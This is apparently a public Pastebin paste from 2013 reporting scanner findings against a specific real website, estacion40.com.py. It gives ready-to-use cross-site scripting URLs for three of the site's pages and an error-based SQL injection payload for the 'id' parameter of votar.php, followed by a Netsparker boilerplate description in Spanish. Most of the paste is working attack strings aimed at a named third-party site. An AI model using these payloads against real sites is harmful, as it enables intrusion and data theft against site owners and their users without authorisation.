YeiZea

(reporte) sitio:estacion40.com.py puertos:80

May 3rd, 2013
139
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.75 KB | None | 0 0
  1. ---------------------------------------------->
  2. Reporte
  3. -------------------------------------------------------------------------------------------->
  4. (ERRORES)
  5. ---------------------------------------------->
  6.  
  7.  
  8.  
  9. Cross Scripting
  10.  
  11. http://www.estacion40.com.py/entrar.php/%22ns=%22YeiZeta(0x000051)%22%3E%3Cscript%3Ealert(9)%3C/script%3E
  12.  
  13. http://www.estacion40.com.py/blog-interno.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001FB)%3C/script%3E
  14.  
  15. http://www.estacion40.com.py/form-registro.php/%22ns=%22Yei Zeta(0x000303)%22%3E%3Cscript%3Ealert(9)%3C/script%3E
  16.  
  17.  
  18. Cookie
  19.  
  20. http://www.estacion40.com.py/entrar.php
  21.  
  22.  
  23. Pro:
  24.  
  25. Url http://www.estacion40.com.py/votar.php
  26. Parameter Name id
  27. Parameter Type Post
  28. Attack Pattern (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  29.  
  30.  
  31. Descripción:
  32.  
  33. Inyección de SQL se produce cuando la entrada de datos, por ejemplo, por un usuario se interpreta como un comando SQL en lugar de los datos normales de la base de datos back-end. Esta es una vulnerabilidad muy común y su explotación exitosa puede tener implicaciones importantes. Aunque Netsparker cree que hay una inyección SQL aquí no podría confirmarlo. Puede haber muchas razones para Netsparker no poder confirmarlo. Le recomendamos investigar el problema de forma manual para asegurar que se trata de una inyección SQL, y que debe ser abordado. También puede considerar el envío de los detalles de este tema para nosotros, para que podamos tratar este tema para la próxima vez y le dará un resultado más preciso.
Advertisement
Add Comment
Please, Sign In to add comment